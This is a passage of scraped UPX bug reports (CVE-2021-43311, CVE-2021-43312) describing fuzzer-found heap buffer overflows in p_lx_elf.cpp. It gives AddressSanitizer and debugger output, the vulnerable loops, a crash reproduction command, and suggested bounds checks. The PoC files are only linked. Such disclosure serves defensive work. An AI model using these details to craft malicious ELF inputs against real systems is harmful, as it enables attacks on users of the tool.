for (si= get\_te32(&buckets\[m\]); 0!=si; si= get\_te32(&chains\[si\]))

PackLinuxElf32::elf\_lookup() at p\_lx\_elf.cpp:5349

for (si= get\_te32(&buckets\[m\]); 0!=si; si= get\_te32(&chains\[si\])) {
            char const \*const p= get\_dynsym\_name(si, (unsigned)-1);
            if (0\==strcmp(name, p)) {
                return &dynsym\[si\];
            }
        }

**What should have happened?**

Decompress a crafted/suspicious file.

**Do you have an idea for a solution?**

We are very grateful to @jreiser for patching the bucket in p\_lx\_elf.cpp in the issue 365. However, in fact, all places involving get\_te32 () should be strengthened in upx, especially in p\_lx\_elf.cpp. The four positions we reported should be patched at least:

1.  p\_lx\_elf.cpp:5382
2.  p\_lx\_elf.cpp:5368
3.  p\_lx\_elf.cpp:5404
4.  p\_lx\_elf.cpp:5349

**How can we reproduce the issue?**

1.  compile upx with address-sanitize
2.  execute cmd

upx.out -df $PoC -o /dev/null

p\_lx\_elf.cpp:5382  
Poc can be found here.

p\_lx\_elf.cpp:5368  
Poc can be found here.

p\_lx\_elf.cpp:5404  
Poc can be found here.

p\_lx\_elf.cpp:5349  
Poc can be found here.

**Please tell us details about your environment.**

*   UPX version used (upx --version):

upx 4.0.0-git-c6b9e3c62d15 (latest-devel-branch)
UCL data compression library 1.03
zlib data compression library 1.2.8
LZMA SDK version 4.43

*   Host Operating System and version:  
    Ubuntu 16.04 64-bit
*   Host CPU architecture:  
    Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz with 8GB
*   Target Operating System and version:  
    same as Host
*   Target CPU architecture:  
    same as Host

CVE-2021-43311: [bug] multi heap buffer overflows in get_le32() · Issue #380 · upx/upx

A heap-based buffer overflow was discovered in upx, during the variable 'bucket' points to an inaccessible address. The issue is being triggered in the function PackLinuxElf64::invert_pt_dynamic at p_lx_elf.cpp:5239.

**What's the problem (or question)?**

A heap-based buffer overflow was discovered in upx, during the variable 'bucket' points to an inaccessible address. The issue is being triggered in the function PackLinuxElf64::invert\_pt\_dynamic at p\_lx\_elf.cpp:5239.

ASAN reports:

\==110294==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x63000000f760 at pc 0x000000466f38 bp 0x7ffcebb0b6a0 sp 0x7ffcebb0b690
READ of size 4 at 0x63000000f760 thread T0
    #0 0x466f37 in PackLinuxElf64::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:5239
    #1 0x46f660 in PackLinuxElf64::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:5127
    #2 0x46f660 in PackLinuxElf64::PackLinuxElf64help1(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:795
    #3 0x470479 in PackLinuxElf64Le::PackLinuxElf64Le(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.h:407
    #4 0x470479 in PackLinuxElf64amd::PackLinuxElf64amd(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:1008
    #5 0x4f34b2 in PackMaster::visitAllPackers(Packer\* (\*)(Packer\*, void\*), InputFile\*, options\_t const\*, void\*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:194
    #6 0x4f50f9 in PackMaster::getUnpacker(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:248
    #7 0x4f521f in PackMaster::unpack(OutputFile\*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:266
    #8 0x52a1e6 in do\_one\_file(char const\*, char\*) /home/test/Desktop/EVAULATION/upx/src/work.cpp:160
    #9 0x52a69e in do\_files(int, int, char\*\*) /home/test/Desktop/EVAULATION/upx/src/work.cpp:271
    #10 0x403ace in main /home/test/Desktop/EVAULATION/upx/src/main.cpp:1538
    #11 0x7f8a7e1c882f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2082f)
    #12 0x404828 in \_start (/home/test/Desktop/EVAULATION/upx/src/upx.out+0x404828)

0x63000000f760 is located 0 bytes to the right of 62304-byte region \[0x630000000400,0x63000000f760)
allocated by thread T0 here:
    #0 0x7f8a7edbc602 in malloc (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x42732a in MemBuffer::alloc(unsigned long long) /home/test/Desktop/EVAULATION/upx/src/mem.cpp:194

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:5239 PackLinuxElf64::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> \> const\*)
Shadow bytes around the buggy address:
  0x0c607fff9e90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c607fff9ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c607fff9eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c607fff9ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c607fff9ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\=>0x0c607fff9ee0: 00 00 00 00 00 00 00 00 00 00 00 00\[fa\]fa fa fa
  0x0c607fff9ef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c607fff9f00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c607fff9f10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c607fff9f20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c607fff9f30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
\==110294\==ABORTING

Then analysis the reasons for segv by debugging:

Program received signal SIGSEGV, Segmentation fault.
0x000000000053b1a8 in PackLinuxElf64::invert\_pt\_dynamic (this=this@entry=0xa00030, dynp=<optimized out\>) at p\_lx\_elf.cpp:5239
5239                if (buckets\[j\]) {
\[ Legend: Modified register | Code | Heap | Stack | String \]
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0x0               
$rbx   : 0x0000000000a00030  →  0x0000000000726a30  →  <vtable+0> add BYTE PTR \[rax\], al
$rcx   : 0x180             
$rdx   : 0xc00             
$rsp   : 0x00007fffffffcbf0  →  0x000000000065fa86  →  <mem\_size(unsigned+0> mov rax, QWORD PTR \[rsp+0x10\]
$rbp   : 0xffffffff        
$rsi   : 0x7aa9            
$rdi   : 0x0000000000a01548  →  0x480000104fe81024
$rip   : 0x000000000053b1a8  →  <PackLinuxElf64::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> mov eax, DWORD PTR \[rdi+rsi\*4+0x14\]
$r8    : 0x12              
$r9    : 0xffe0            
$r10   : 0xc10             
$r11   : 0x7               
$r12   : 0x8               
$r13   : 0x180             
$r14   : 0x0000000000a0f4d8  →  0x000000000000000d
$r15   : 0x0               
$eflags: \[carry PARITY adjust ZERO sign trap INTERRUPT direction overflow RESUME virtualx86 identification\]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffcbf0│+0x0000: 0x000000000065fa86  →  <mem\_size(unsigned+0> mov rax, QWORD PTR \[rsp+0x10\]     ← $rsp
0x00007fffffffcbf8│+0x0008: 0x0000000000400298  →   add eax, DWORD PTR \[rax\]
0x00007fffffffcc00│+0x0010: 0x000000000000ffe0
0x00007fffffffcc08│+0x0018: 0x000000000000f360
0x00007fffffffcc10│+0x0020: 0x00007ffff7352260  →  <read+16> cmp rax, 0xfffffffffffff001
0x00007fffffffcc18│+0x0028: 0x000000000000f360
0x00007fffffffcc20│+0x0030: 0x00007ffff7362447  →  <lseek64+7> cmp rax, 0xfffffffffffff001
0x00007fffffffcc28│+0x0038: 0x0000000000539692  →  <PackLinuxElf64::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> mov rax, QWORD PTR \[rsp+0x10\]
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
     0x53b197 <PackLinuxElf64::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> mov    rcx, QWORD PTR \[rsp+0x8\]
     0x53b19c <PackLinuxElf64::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> mov    rdx, QWORD PTR \[rsp\]
     0x53b1a0 <PackLinuxElf64::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> lea    rsp, \[rsp+0x98\]
 →   0x53b1a8 <PackLinuxElf64::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> mov    eax, DWORD PTR \[rdi+rsi\*4+0x14\]
     0x53b1ac <PackLinuxElf64::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> test   eax, eax
     0x53b1ae <PackLinuxElf64::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> je     0x53b235 <PackLinuxElf64::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,  LE32,  LE64,  LE64,  LE64> \> const\*)+7109>
     0x53b1b4 <PackLinuxElf64::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> lea    rsp, \[rsp-0x98\]
     0x53b1bc <PackLinuxElf64::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> mov    QWORD PTR \[rsp\], rdx
     0x53b1c0 <PackLinuxElf64::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> mov    QWORD PTR \[rsp+0x8\], rcx
───────────────────────────────────────────────────────────────────────────────────────────────────────────────── source:p\_lx\_elf.cpp+5239 ────
   5234             unsigned     const \*const hasharr = &buckets\[n\_bucket\]; (void)hasharr;
   5235           //unsigned     const \*const gashend = &hasharr\[n\_bucket\];  // minimum, except:
   5236             // Rust and Android trim unused zeroes from high end of hasharr\[\]
   5237             unsigned bmax = 0;
   5238             for (unsigned j= 0; j < n\_bucket; ++j) {
 → 5239                 if (buckets\[j\]) {
   5240                     if (buckets\[j\] < symbias) {
   5241                         char msg\[50\]; snprintf(msg, sizeof(msg),
   5242                                 "bad DT\_GNU\_HASH bucket\[%d\] < symbias{%#x}\\n",
   5243                                 buckets\[j\], symbias);
   5244                         throwCantPack(msg);
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
\[#0\] Id 1, Name: "upx.out", stopped, reason: SIGSEGV
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
\[#0\] 0x53b1a8 → PackLinuxElf64::invert\_pt\_dynamic(this=0xa00030, dynp=<optimized out>)
\[#1\] 0x53d654 → PackLinuxElf64::invert\_pt\_dynamic(dynp=<optimized out>, this=0xa00030)
\[#2\] 0x53d654 → PackLinuxElf64::PackLinuxElf64help1(this=0xa00030, f=0x7fffffffce10)
\[#3\] 0x53f186 → PackLinuxElf64Le::PackLinuxElf64Le(f=0x7fffffffce10, this=0xa00030)
\[#4\] 0x53f186 → PackLinuxElf64amd::PackLinuxElf64amd(this=0xa00030, f=0x7fffffffce10)
\[#5\] 0x6048ac → PackMaster::visitAllPackers(func=0x602c30 <try\_unpack(Packer\*, void\*)>, f=0x7fffffffce10, o=0x7fffffffcfc8, user=0x7fffffffce10)
\[#6\] 0x6072ca → PackMaster::getUnpacker(f=<optimized out>)
\[#7\] 0x6072ca → PackMaster::unpack(this=0x7fffffffcfb0, fo=0x7fffffffcee0)
\[#8\] 0x670dc5 → do\_one\_file(iname=0x7fffffffdf12 "id:000036,sig:11,src:000541+000827,op:MOpt-splice,rep:2", oname=0x7fffffffd550 "/dev/null")
\[#9\] 0x67157c → do\_files(i=0x4, argc=0x5, argv=0x7fffffffdac8)

The instruction to crash is, corresponds to the bucket \[j\] in the source code

mov    eax, DWORD PTR \[rdi+rsi\*4+0x14\]

The register rdi and rsi are:

$rsi   : 0x7aa9            
$rdi   : 0x0000000000a01548

The DWORD PTR pointer to 0xa20000, where is a invalid address.

gef➤  x /10xg 0xa20000
0xa20000:    Cannot access memory at address 0xa20000

**What should have happened?**

Decompress a crafted/suspicious file.

**Do you have an idea for a solution?**

A boundary check is needed for loop variable 'j' because the size allocated for variable 'buckets' is limited.

upx\_uint64\_t const \*const bitmask = (upx\_uint64\_t const \*)(void const \*)&gashtab\[4\];
unsigned     const \*const buckets = (unsigned const \*)&bitmask\[n\_bitmask\];
unsigned     const \*const hasharr = &buckets\[n\_bucket\]; (void)hasharr;
//unsigned     const \*const gashend = &hasharr\[n\_bucket\];  // minimum, except:
// Rust and Android trim unused zeroes from high end of hasharr\[\]
unsigned bmax = 0;
for (unsigned j= 0; j < n\_bucket; ++j) {
    if (buckets\[j\]) {
        if (buckets\[j\] < symbias) {
            char msg\[50\]; snprintf(msg, sizeof(msg),
                                   "bad DT\_GNU\_HASH bucket\[%d\] < symbias{%#x}\\n",
                                   buckets\[j\], symbias);
            throwCantPack(msg);
        }
        if (bmax < buckets\[j\]) {
            bmax = buckets\[j\];
        }
    }
}

**How can we reproduce the issue?**

1.  compile upx with address-sanitize
2.  execute cmd

upx.out -df $PoC -o /dev/null

Poc can be found here.

**Please tell us details about your environment.**

*   UPX version used (upx --version):

upx 4.0.0-git-c6b9e3c62d15 (latest-devel-branch)
UCL data compression library 1.03
zlib data compression library 1.2.8
LZMA SDK version 4.43

*   Host Operating System and version:  
    Ubuntu 16.04 64-bit
*   Host CPU architecture:  
    Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz with 8GB
*   Target Operating System and version:  
    same as Host
*   Target CPU architecture:  
    same as Host

CVE-2021-43312: [bug] heap buffer overflow in PackLinuxElf64::invert_pt_dynamic at p_lx_elf.cpp:5239 · Issue #379 · upx/upx

A heap-based buffer overflow was discovered in upx, during the variable 'bucket' points to an inaccessible address. The issue is being triggered in the function PackLinuxElf32::invert_pt_dynamic at p_lx_elf.cpp:1688.

**What's the problem (or question)?**

A heap-based buffer overflow was discovered in upx, during the variable 'bucket' points to an inaccessible address. The issue is being triggered in the function PackLinuxElf32::invert\_pt\_dynamic at p\_lx\_elf.cpp:1688.

ASAN reports:

\==110358==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61600000fed9 at pc 0x00000045acc8 bp 0x7ffd88c9b020 sp 0x7ffd88c9b010
READ of size 4 at 0x61600000fed9 thread T0
    #0 0x45acc7 in PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16, LE32, LE32, LE32, LE32> > const\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:1688
    #1 0x463ba5 in PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16, LE32, LE32, LE32, LE32> > const\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:1583
    #2 0x463ba5 in PackLinuxElf32::PackLinuxElf32help1(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:305
    #3 0x464e96 in PackLinuxElf32Le::PackLinuxElf32Le(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.h:395
    #4 0x464e96 in PackLinuxElf32x86::PackLinuxElf32x86(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:4800
    #5 0x464e96 in PackBSDElf32x86::PackBSDElf32x86(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:4817
    #6 0x464e96 in PackFreeBSDElf32x86::PackFreeBSDElf32x86(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:4828
    #7 0x4f337a in PackMaster::visitAllPackers(Packer\* (\*)(Packer\*, void\*), InputFile\*, options\_t const\*, void\*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:190
    #8 0x4f50f9 in PackMaster::getUnpacker(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:248
    #9 0x4f521f in PackMaster::unpack(OutputFile\*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:266
    #10 0x52a1e6 in do\_one\_file(char const\*, char\*) /home/test/Desktop/EVAULATION/upx/src/work.cpp:160
    #11 0x52a69e in do\_files(int, int, char\*\*) /home/test/Desktop/EVAULATION/upx/src/work.cpp:271
    #12 0x403ace in main /home/test/Desktop/EVAULATION/upx/src/main.cpp:1538
    #13 0x7ff33c8dc82f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2082f)
    #14 0x404828 in \_start (/home/test/Desktop/EVAULATION/upx/src/upx.out+0x404828)

0x61600000fed9 is located 1 bytes to the right of 600-byte region \[0x61600000fc80,0x61600000fed8)
allocated by thread T0 here:
    #0 0x7ff33d4d0602 in malloc (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x42732a in MemBuffer::alloc(unsigned long long) /home/test/Desktop/EVAULATION/upx/src/mem.cpp:194

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:1688 PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16, LE32, LE32, LE32, LE32> \> const\*)
Shadow bytes around the buggy address:
  0x0c2c7fff9f80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2c7fff9f90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2c7fff9fa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2c7fff9fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2c7fff9fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\=>0x0c2c7fff9fd0: 00 00 00 00 00 00 00 00 00 00 00\[fa\]fa fa fa fa
  0x0c2c7fff9fe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2c7fff9ff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2c7fffa000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2c7fffa010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2c7fffa020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
\==110358\==ABORTING

Then analysis the reasons for segv by debugging:

Program received signal SIGSEGV, Segmentation fault.
0x0000000000527258 in PackLinuxElf32::invert\_pt\_dynamic (this=this@entry=0xa00030, dynp=<optimized out\>) at p\_lx\_elf.cpp:1688
1688                if (buckets\[j\]) {
\[ Legend: Modified register | Code | Heap | Stack | String \]
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0x0000000000a009c1  →  0x00000000ffffffff
$rbx   : 0x0000000000a00030  →  0x00000000007267a0  →  <vtable+0> add BYTE PTR \[rax\], al
$rcx   : 0x0               
$rdx   : 0x0               
$rsp   : 0x00007fffffffcc10  →  0x0000000000a007c0  →  0xff0000010900457f
$rbp   : 0xffffff00        
$rsi   : 0x7d88            
$rdi   : 0x6               
$rip   : 0x0000000000527258  →  <PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> mov r9d, DWORD PTR \[rax+rsi\*4+0x1c\]
$r8    : 0x0               
$r9    : 0x0               
$r10   : 0x10              
$r11   : 0x0               
$r12   : 0xd               
$r13   : 0xffffffff        
$r14   : 0x200             
$r15   : 0x0               
$eflags: \[carry PARITY adjust ZERO sign trap INTERRUPT direction overflow RESUME virtualx86 identification\]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffcc10│+0x0000: 0x0000000000a007c0  →  0xff0000010900457f     ← $rsp
0x00007fffffffcc18│+0x0008: 0x0000000000000000
0x00007fffffffcc20│+0x0010: 0x00007ffff7352260  →  <read+16> cmp rax, 0xfffffffffffff001
0x00007fffffffcc28│+0x0018: 0x0000000000000258
0x00007fffffffcc30│+0x0020: 0x00007ffff7362447  →  <lseek64+7> cmp rax, 0xfffffffffffff001
0x00007fffffffcc38│+0x0028: 0x00000000005255b2  →  <PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> mov rax, QWORD PTR \[rsp+0x10\]
0x00007fffffffcc40│+0x0030: 0x0000000000000000
0x00007fffffffcc48│+0x0038: 0x0000000000000000
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
     0x527247 <PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> mov    rcx, QWORD PTR \[rsp+0x8\]
     0x52724c <PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> mov    rdx, QWORD PTR \[rsp\]
     0x527250 <PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> lea    rsp, \[rsp+0x98\]
 →   0x527258 <PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> mov    r9d, DWORD PTR \[rax+rsi\*4+0x1c\]
     0x52725d <PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> test   r9d, r9d
     0x527260 <PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> je     0x5272eb <PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,  LE32,  LE32,  LE32,  LE32> \> const\*)+7515>
     0x527266 <PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> xchg   ax, ax
     0x527268 <PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> lea    rsp, \[rsp-0x98\]
     0x527270 <PackLinuxElf32::invert\_pt\_dynamic(N\_Elf::Dyn<N\_Elf::ElfITypes<LE16,+0> mov    QWORD PTR \[rsp\], rdx
───────────────────────────────────────────────────────────────────────────────────────────────────────────────── source:p\_lx\_elf.cpp+1688 ────
   1683             unsigned     const \*const hasharr = &buckets\[n\_bucket\]; (void)hasharr;
   1684           //unsigned     const \*const gashend = &hasharr\[n\_bucket\];  // minimum, except:
   1685             // Rust and Android trim unused zeroes from high end of hasharr\[\]
   1686             unsigned bmax = 0;
   1687             for (unsigned j= 0; j < n\_bucket; ++j) {
 → 1688                 if (buckets\[j\]) {
   1689                     if (buckets\[j\] < symbias) {
   1690                         char msg\[50\]; snprintf(msg, sizeof(msg),
   1691                                 "bad DT\_GNU\_HASH bucket\[%d\] < symbias{%#x}\\n",
   1692                                 buckets\[j\], symbias);
   1693                         throwCantPack(msg);
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
\[#0\] Id 1, Name: "upx.out", stopped, reason: SIGSEGV
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
\[#0\] 0x527258 → PackLinuxElf32::invert\_pt\_dynamic(this=0xa00030, dynp=<optimized out>)
\[#1\] 0x529294 → PackLinuxElf32::invert\_pt\_dynamic(dynp=<optimized out>, this=0xa00030)
\[#2\] 0x529294 → PackLinuxElf32::PackLinuxElf32help1(this=0xa00030, f=0x7fffffffce20)
\[#3\] 0x52c65e → PackLinuxElf32Le::PackLinuxElf32Le(f=0x7fffffffce20, this=0xa00030)
\[#4\] 0x52c65e → PackLinuxElf32x86::PackLinuxElf32x86(f=0x7fffffffce20, this=0xa00030)
\[#5\] 0x52c65e → PackBSDElf32x86::PackBSDElf32x86(f=0x7fffffffce20, this=0xa00030)
\[#6\] 0x52c65e → PackFreeBSDElf32x86::PackFreeBSDElf32x86(this=0xa00030, f=0x7fffffffce20)
\[#7\] 0x60448c → PackMaster::visitAllPackers(func=0x602c30 <try\_unpack(Packer\*, void\*)>, f=0x7fffffffce20, o=0x7fffffffcfd8, user=0x7fffffffce20)
\[#8\] 0x6072ca → PackMaster::getUnpacker(f=<optimized out>)
\[#9\] 0x6072ca → PackMaster::unpack(this=0x7fffffffcfc0, fo=0x7fffffffcef0)

The instruction to crash is, corresponds to the bucket \[j\] in the source code

mov    r9d, DWORD PTR \[rax+rsi\*4+0x1c\]

The value of register rax and rsi are:

$rax   : 0x0000000000a009c1
$rsi   : 0x7d88

The DWORD PTR pointer to 0xa1fffd, where the 0xa20000 is a invalid address.

gef➤  x /10xg 0xa1fffd
0xa1fffd:    Cannot access memory at address 0xa20000

**What should have happened?**

Decompress a crafted/suspicious file.

**Do you have an idea for a solution?**

A boundary check is needed for loop variable 'j' because the size allocated for variable 'buckets' is limited.

unsigned const \*const bitmask = (unsigned const \*)(void const \*)&gashtab\[4\];
unsigned     const \*const buckets = (unsigned const \*)&bitmask\[n\_bitmask\];
unsigned     const \*const hasharr = &buckets\[n\_bucket\]; (void)hasharr;
//unsigned     const \*const gashend = &hasharr\[n\_bucket\];  // minimum, except:
// Rust and Android trim unused zeroes from high end of hasharr\[\]
unsigned bmax = 0;
for (unsigned j= 0; j < n\_bucket; ++j) {
    if (buckets\[j\]) {

**How can we reproduce the issue?**

1.  compile upx with address-sanitize
2.  execute cmd

upx.out -df $PoC -o /dev/null

Poc can be found here.

**Please tell us details about your environment.**

*   UPX version used (upx --version):

upx 4.0.0-git-c6b9e3c62d15 (latest-devel-branch)
UCL data compression library 1.03
zlib data compression library 1.2.8
LZMA SDK version 4.43

*   Host Operating System and version:  
    Ubuntu 16.04 64-bit
*   Host CPU architecture:  
    Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz with 8GB
*   Target Operating System and version:  
    same as Host
*   Target CPU architecture:  
    same as Host

Tag

#buffer_overflow